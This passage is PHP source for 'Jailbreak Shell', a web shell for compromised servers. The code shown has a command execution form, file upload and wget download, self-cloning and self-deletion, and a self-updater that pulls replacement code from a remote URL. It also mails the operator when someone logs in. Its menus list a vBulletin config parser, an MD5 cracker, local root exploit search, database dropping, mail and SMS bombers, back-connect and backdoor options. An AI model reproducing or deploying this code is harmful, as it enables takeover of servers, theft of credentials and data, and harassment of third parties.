                $sql_table_count = mysql_num_rows($sql_tables);
				echo "<tr><td width='55%'><a href='$self?do=sqledit&database=$row->Database'>".$row->Database."</a></td><td width='15%'>".$sql_table_count."</td><td width='15%'>Download</td><td width='15%'><a href='$self?do=sqldbs&dropdb=".$row->Database."'>Drop</a></td></tr>";
			endwhile;
			
			echo "</tr>";
			echo "</table>";
			
		break;
		case 'tools':
			echo "<center>";
			echo "<table width='95%'>";
			echo "<th width='95%'>Tools</th>";
			echo "</table>";
			echo "<table width='95%'>";
			echo "<tr>";
			echo "<td width='50%'>vBulletin Config Parser</td>";
			echo "<td width='50%'>phpCrack MD5 Cracker</td>";
			echo "</tr>";
			echo "<tr>";
			echo "<td width='50%'><input type='text' name='configdir' value='/path/to/config.php' /><input type='submit' value='Parse' /></td>";
			echo "<td width='50%'><input type='text' name='hashedpw' value='md5 hash' /><input type='submit' value='Crack' /></td>";
			echo "</tr>";
			echo "<tr>";
			echo "<td width='50%'>Local Root Exploit Search</td>";
			echo "<td width='50%'></td>";
			echo "</tr>";
			echo "<tr>";
			echo "<td width='50%'><input type='text' name='kernel_version' value='' /><input type='submit' value='Set' /></td>";
			echo "<td width='50%'><input type='text' name='custom_version_url' value='' /><input type='submit' value='Set' /></td>";
			echo "</tr>";
			echo "</table>";
		break;
		case 'cloneself':
			global $self;
			echo "<center>";
			echo "<form action='$self' method='post'>";
			echo "<input type='hidden' name='do' value='docloneself' />";
			echo "Please choose a filename: ";
			echo "<input type='text' size='30' name='clone_filename' value='".$self."' />";
			echo "<br />";
			echo "<input type='submit' name='submit' value='Clone' />";
			echo "</form>";
		break;
		case 'docloneself':
			global $self;
			echo "<center>";
			if(!empty($_REQUEST['clone_filename']))
			{
				$file_get_self = @file_get_contents($self);
				if(!@file_put_contents($_REQUEST['clone_filename'],$file_get_self))
				{
					echo "Failed to clone shell!";
				} else {
					echo "Shell cloned successfully to <a href='".$_REQUEST['clone_filename']."'>".$_REQUEST['clone_filename']."</a>!";
				}
			} else {
				echo "No filename defined!";
			}
		break;
		case 'killshell':
			global $self;
			echo "<center>";
			echo "<form action='$self' method='post'>";
			echo "<input type='hidden' name='do' value='dokillshell' />";
			echo "Do you really want to kill your shell?";
			echo "<br />";
			echo "<input type='submit' value='Kill' />";
			echo "</form>";
		break;
		case 'dokillshell':
			global $self;
			echo "<center>";
			if(empty($_SERVER['HTTP_REFERER']))
			{
				echo "Cannot be accessed directly!";
			} else {
				if(!unlink($self))
				{
					echo "Failed to kill shell!";
				} else {
					echo "Shell killed successfully!";
					echo "<script type='text/javascript'>window.location = '$self';</script>";
				}
			}
		break;
		case 'update':
			echo "<center>";
			global $self;
			global $update;
			global $version;
			global $check_version_url;
			if($update == true)
			{
				$checkversion = @file_get_contents($check_version_url);
				if($checkversion == $version)
				{
					$update_available = false;
				} else {
					$update_available = true;
				}
				
				if($update_available == true)
				{
					echo "There's an update available ($checkversion). Would you like to download it?";
					echo "<br />";
					echo "Updating may corrupt this shell, so as a backup, the shell will create a clone of itself.";
					echo "<br />";
					echo "If the shell updates successfully, it will give you the option to delete the clone.";
					echo "<br />";
					echo "Upon updating, the default username and password will be set to <b>jbshell</b>.";
					echo "<form action='$self' method='post'>";
					echo "<input type='hidden' name='do' value='doupdate' />";
					echo "<input type='submit' name='doupdate' value='Update' />";
					echo "</form>";
				} else {
					echo "There's no update available yet.";
				}
			} else {
				echo "Updating is currently disabled.";
			}
		break;
		case 'doupdate':
			global $self;
			global $update_available;
			global $update_url;
			echo "<center>";
			if(!empty($_SERVER['HTTP_REFERER']))
			{
				if($update_available == true)
				{
					$clone_self = file_get_contents($self);
					$get_new_code = file_get_contents($update_url);
					$clone_pls = file_put_contents($self.".clone.php",$clone_self);
					if($clone_pls)
					{
						if(file_put_contents($self,$get_new_code))
						{
							echo "Update complete!";
						} else {
						
						}
					} else {
						echo "Couldn't clone shell! Update will not work!";
					}
				} else {
					echo "No update available.";
				}
			} else {
				echo "Cannot link directly to the updater!";
			}
		break;
		case 'deleteclones':
			global $self;
			echo "<center>";
			if(unlink($self.".clone.php"))
			{
				echo "Cloned shell was deleted successfully.";
			} else {
				echo "Failed to delete cloned shell!";
			}
		break;
	}
}

if(!isset($_REQUEST['skin']))
{
	$_REQUEST['skin'] = 'empty';
}

if((isset($_REQUEST['do'])) && ($_REQUEST['do'] == 'sqldbs'))
{
	if(!isset($_COOKIE['sql_host']))
	{
		setcookie('sql_host',$_REQUEST['sql_host'],time()+3600*24*365);
		setcookie('sql_user',$_REQUEST['sql_user'],time()+3600*24*365);
		setcookie('sql_pass',$_REQUEST['sql_pass'],time()+3600*24*365);
		setcookie('sql_port',$_REQUEST['sql_port'],time()+3600*24*365);
	}
}

if(!isset($_SESSION['skin']))
{
	$_SESSION['skin'] = 'default';
}

if(isset($_POST['jbshell_login']))
{
	if($jbshell_auth_user == $_REQUEST['jbshell_user'])
	{
		if($jbshell_auth_pass == $_REQUEST['jbshell_pass'])
		{
			setcookie('jbshell_user',$_REQUEST['jbshell_user'],time()+3600*24*365);
			setcookie('jbshell_pass',$_REQUEST['jbshell_pass'],time()+3600*24*365);
			setcookie('jbshell_loggedin','yes',time()+3600*24*365);
		}
	}
}
if(isset($_REQUEST['do']) && $_REQUEST['do'] == 'logout')
{
	setcookie('jbshell_user','',time()-3600);
	setcookie('jbshell_pass','',time()-3600);
	setcookie('jbshell_loggedin','',time()-3600);
}

if((isset($_COOKIE['jbshell_loggedin'])) && ($_COOKIE['jbshell_loggedin'] != 'yes'))
{
	setcookie('jbshell_loggedin','yes',time()-3600);
}

switch($_REQUEST['skin'])
{
	case 'mulciber':
		$_SESSION['skin'] = 'mulciber';
	break;
	case 'green':
		$_SESSION['skin'] = 'green';
	break;
	case 'default':
		$_SESSION['skin'] = 'default';
	break;
}

// check version
$checkversion = @file_get_contents($check_version_url);
if($checkversion == $version)
{
	$update_available = false;
} else {
	$update_available = true;
}

if($update == true)
{
	if($update_available == true)
	{
		$update_status = "Update is available <a href='$self?do=update'>[&bull; $checkversion &bull;]</a>";
	} else {
		$update_status = "Latest version";
	}
} else {
	$update_status = "Update is disabled";
}

?>

<html>
<head>
<title>Jailbreak Shell <?php echo $version; ?></title>
<style type="text/css">
<?php if(isset($_SESSION['skin']))
{
if($_SESSION['skin'] == 'mulciber')
{ ?>
body {
	background-color: #000;
	color: #fff;
	font-family: tahoma;
	font-size: 12px;
}
td {
	border: 1px solid #000099;
	background-color: #000033;
	padding: 2px;
	font-weight: bold;
	text-align: center;
	font-size: 11px;
}
td:hover {
	color: yellow;
	background: black;
}
input {
	background-color: black;
	color: white;
	border: 1px solid #000066;

}
input:hover {
	background-color: #000066;
	border: 1px solid white;
}
input.first {
	height: 100px;
}
textarea {
	background-color: #000033;
	color: white;
	border: 1px solid white;
}
a {
	text-decoration: none;
	color: white;
	font-weight: bold;
}
a:hover {
	color: yellow
}
<?php } else if($_SESSION['skin'] == 'green')
{ ?>
body {
	background-color: #000;
	color: #fff;
	font-family: tahoma;
	font-size: 12px;
}
td {
	border: 1px solid #7FFF00;
	background-color: #000000;
	padding: 2px;
	font-weight: bold;
	text-align: center;
	font-size: 11px;
}
td:hover {
	color: yellow;
	background: black;
}
input {
	background-color: black;
	color: white;
	border: 1px solid #7FFF00;

}
input.first {
	height: 100px;
}
textarea {
	background-color: black;
	color: white;
	border: 1px solid #7FFF00;
}
a {
	text-decoration: none;
	color: white;
	font-weight: bold;
}
a:hover {
	color: yellow
}
<?php } else if($_SESSION['skin'] == 'default')
{ ?>
body {
	background-color: #000;
	color: #fff;
	font-family: tahoma;
	font-size: 12px;
}
td {
	border: 1px solid #007EFF;
	background-color: #000000;
	padding: 2px;
	font-weight: bold;
	text-align: center;
	font-size: 11px;
	border-radius: 5px;
	-moz-border-radius: 5px;
	-webkit-border-radius: 5px;
}
td:hover {
	color: yellow;
	background: black;
}
input {
	background-color: black;
	color: white;
	border: 1px solid #007EFF;
	border-radius: 10px;
	-moz-border-radius: 10px;
	-webkit-border-radius: 10px;
}
input.first {
	height: 100px;
}
textarea {
	background-color: black;
	color: white;
	border: 1px solid #007EFF;
	border-radius: 10px;
	-moz-border-radius: 10px;
	-webkit-border-radius: 10px;
}
a {
	text-decoration: none;
	color: white;
	font-weight: bold;
}
a:hover {
	color: yellow
}
<?php }
} else { ?>
body {
	background-color: #000;
	color: #fff;
	font-family: tahoma;
	font-size: 12px;
}
td {
	border: 1px solid #007EFF;
	background-color: #000000;
	padding: 2px;
	font-weight: bold;
	text-align: center;
	font-size: 11px;
}
td:hover {
	color: yellow;
	background: black;
}
input {
	background-color: black;
	color: white;
	border: 1px solid #007EFF;

}
input.first {
	height: 100px;
}
textarea {
	background-color: black;
	color: white;
	border: 1px solid #007EFF;
}
a {
	text-decoration: none;
	color: white;
	font-weight: bold;
}
a:hover {
	color: yellow
}
<?php } ?>
.warning_box_top {
	top: 0px;
	left: 0px;
	background-color: #ff0000;
	color: #ffffff;
	font-weight: bold;
	text-align: center;
}
</style>
</head>
<body>
<center>
<?php if(($lock == true) && ((!isset($_COOKIE['jbshell_user'])) OR ($_COOKIE['jbshell_user'] != $jbshell_auth_user)) && ((!isset($_COOKIE['jbshell_pass'])) OR ($_COOKIE['jbshell_pass'] != $jbshell_auth_pass))) { ?>

	<h1><?php echo $welcometext; ?></h1>
	<h2>Jailbreak Shell is currently locked. Please login to continue!</h2>

	<form action='<?php echo $self; ?>' method='post'>
	<input type='text' name='jbshell_user' size='30' />
	<input type='password' name='jbshell_pass' size='30' />
	<input type='submit' name='jbshell_login' value='Login' />
	</form>
	
	<h5>Jailbreak Shell &copy; @xijailbreakx 2012-2014</h5>
	<h5>If you do not own this shell, please do not use it.</h5>

	<?php if(((isset($_REQUEST['jbshell_login'])) && ($jbshell_auth_user != $_REQUEST['jbshell_user'])) OR ((isset($_REQUEST['jbshell_login'])) && ($jbshell_auth_pass != $_REQUEST['jbshell_pass'])) OR ((isset($_REQUEST['jbshell_login'])) && ($jbshell_auth_user != $_REQUEST['jbshell_user']) && ($jbshell_auth_pass != $_REQUEST['jbshell_pass']))) { ?>
		<h3>Bad login!</h3>
	<?php }
		if((isset($_REQUEST['jbshell_login'])) && ($jbshell_auth_user == $_REQUEST['jbshell_user']) && ($jbshell_auth_pass == $_REQUEST['jbshell_pass'])) {
	?>
		<h3>Login correct!</h3>
	<?php 
	if($traceback == true)
	{
		mail($traceback_email,$traceback_subject,$traceback_body,$traceback_headers);
	}
	header("Location: $self");
	} ?>
<?php } elseif(((isset($_COOKIE['jbshell_user'])) && ($jbshell_auth_user == $_COOKIE['jbshell_user']) && ($jbshell_auth_pass == $_COOKIE['jbshell_pass'])) OR ($lock == false) OR (($_COOKIE['jbshell_user'] == $jbshell_auth_user) && ($_COOKIE['jbshell_pass'] == $jbshell_auth_pass))) { ?>
<?php if($lock == false) { ?>
<div class='warning_box_top'>Lock disabled! Your shell can be accessed by anyone!</div>
<?php } ?>
<?php
if(!isset($_SESSION['traceback_sent']))
{
	if($traceback == true)
	{
		if($lock == true)
		{
			mail($traceback_email,$traceback_subject,$traceback_body,$traceback_headers);
			$_SESSION['traceback_sent'] = 'yes';
		}
	}
}
?>
<table width="95%">
	<tr>
		<td width="10%">Host</td>
		<td width="10%">Server IP</td>
		<td width="10%">Server Disk</td>
		<td width="10%">Server OS</td>
		<td width="10%">Server Software</td>
		<td width="10%">Your IP</td>
		<td width="10%">Shell Name</td>
		<td width="10%">Shell Location</td>
		<td width="10%">Disabled PHP Functions</td>
		<td width="10%">Current Directory Writeable?</td>
	</tr>
	<tr>
		<td width="10%"><?php echo $_SERVER['HTTP_HOST']; ?></td>
		<td width="10%"><?php echo @gethostbyname($_SERVER['HTTP_HOST']); ?></td>
		<td width="10%"><?php echo $space.' used of '.$total; ?></td>
		<td width="10%"><?php echo @php_uname(); ?></td>
		<td width="10%"><?php echo $_SERVER['SERVER_SOFTWARE']; ?></td>
		<td width="10%"><?php echo $_SERVER['REMOTE_ADDR'];?></td>
		<td width="10%"><?php echo $self ?></td>
		<td width="10%"><?php echo thisdir(getcwd()).'/'.basename($_SERVER['PHP_SELF']); ?></td>
		<td width="10%"><?php getdisabled(); ?></td>
		<td width="10%"><?php if(is_writeable(getcwd())){echo "Yes!";} else {echo "No!";} ?></td>
	</tr>
</table>

<table width="95%">
	<tr>
		<td width="15%">Execute Command:</td>
		<td width="85%"><form action="<?php echo $self; ?>" method="post"><input type="hidden" name="do" value="cmd" /><input type="text" name="cmd" size="100" /> <input type="submit" name="executecmd" value="Execute" /></form></td>
	</tr>
</table>

<br />

<b>
[ <a href="<?php echo $self; ?>">Main</a> ]
&nbsp;&nbsp;&nbsp;
[ <a href="<?php echo $self; ?>?do=info">Info</a> ]
&nbsp;&nbsp;&nbsp;
[ <a href="<?php echo $self; ?>?do=sql">SQL</a> ]
&nbsp;&nbsp;&nbsp;
[ <a href="<?php echo $self; ?>?do=files">Files</a> ]
&nbsp;&nbsp;&nbsp;
[ <a href="<?php echo $self; ?>?do=secinfo">Security Info</a> ]
&nbsp;&nbsp;&nbsp;
[ <a href="<?php echo $self; ?>?do=tools">Tools</a> ]
&nbsp;&nbsp;&nbsp;
[ <a href="<?php echo $self; ?>?do=reverseip">Reverse IP</a> ]
&nbsp;&nbsp;&nbsp;
[ <a href="<?php echo $self; ?>?do=mailer">Mail Bomber</a> ]
&nbsp;&nbsp;&nbsp;
[ <a href="<?php echo $self; ?>?do=sms">SMS Bomber</a> ]
&nbsp;&nbsp;&nbsp;
[ Back Connect ]
&nbsp;&nbsp;&nbsp;
[ Backdoor Host ]
&nbsp;&nbsp;&nbsp;
[ <a href="<?php echo $self; ?>?do=cloneself">Create Clone</a> ]
&nbsp;&nbsp;&nbsp;
[ <a href="<?php echo $self; ?>?do=killshell">Kill Shell</a> ]
&nbsp;&nbsp;&nbsp;
[ <a href="<?php echo $self; ?>?do=logout">Logout</a> ]
</b>

<br /><br />

<?php mainscreen(); ?>

<table width="95%">
	<tr>
		<td width="100%">Extras</td>
	</tr>
</table>

<table width="95%">
	<tr>
		<td width="50%">Create File</td>
		<td width="50%">Upload File</td>
	</tr>
	<tr>
		<td width="50%"><form action="<?php echo $self; ?>" method="post"><input type="hidden" name="do" value="createfile" /><input type="text" size="50" name="createfilename" /><input type="submit" name="submit" value="Create" /></form></td>
		<td width="50%"><form action="<?php echo $self; ?>" method="post" enctype="multipart/form-data"><input type="hidden" name="do" value="uploadfile" /><label for="file">File:</label><input type="file" name="file" id="file" /> <input type="submit" name="submit" value="Submit" /></form></td>
	</tr>
	<tr>
		<td width="50%">Create Directory</td>
		<td width="50%">Wget File</td>
	</tr>
	<tr>
		<td width="50%"><form action="<?php echo $self; ?>" method="post"><input type="hidden" name="do" value="createdirectory" /><input type="text" size="50" name="createdirname" /><input type="submit" name="submit" value="Create" /></form></td>
		<td width="50%"><form action="<?php echo $self; ?>" method="post"><input type="hidden" name="do" value="wgetfile" /><input type="text" size="50" name="wgetlink" /><input type="submit" name="submit" value="Wget" /></form></td>
	</tr>
</table>

<table width="95%">
	<tr>
		<td width="50%">Jailbreak Shell by @xijailbreakx | <?php echo $update_status; ?> | Switch skin: <a href="<?php echo $self; ?>?skin=default">Default</a> - <a href="<?php echo $self; ?>?skin=mulciber">Mulciber</a> - <a href="<?php echo $self; ?>?skin=green">Green</a> | Server Time: <?php echo date("H").":".date("i"); ?><?php if(file_exists($self.".clone.php")){ ?> | <a href="<?php echo $self; ?>?do=deleteclones">Delete backup shell</a><?php } ?></td>
	</tr>
</table>
</center>
<?php } ?>
</body>
</html>